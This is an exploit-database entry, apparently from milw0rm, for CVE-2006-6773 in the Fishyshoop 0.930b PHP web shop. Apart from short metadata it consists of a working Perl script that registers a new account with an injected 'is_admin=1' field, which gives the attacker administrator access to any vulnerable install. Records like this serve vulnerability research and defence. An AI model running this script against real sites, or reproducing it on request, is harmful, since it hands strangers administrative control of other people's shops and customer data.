Fishyshoop 0.930b - Remote Add Administrator Account

Author: James Gray
type: webapps
platform: php
port: nan
date_added: 2006-12-24 
date_updated: 2016-09-20 
verified: 1 
codes: CVE-2006-6773 
tags: 
aliases:  
screenshot_url:  
application_url: 

#!/usr/bin/perl
# James Gray <james6.0[@]gmail.com>
# Fishyshoop Security Vulnerability

use WWW::Curl::Easy;

sub usage() {
 print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>\n";
 exit();
}

$FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage();

my $fishyshoop = new WWW::Curl::Easy;
$fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register");
$fishyshoop->setopt(CURLOPT_POST, 1);
$fishyshoop->setopt(CURLOPT_POSTFIELDS, "email=$UNAME&password=$PASS&is_admin=1&submit=1");
$fishyshoop->perform;

# milw0rm.com [2006-12-25]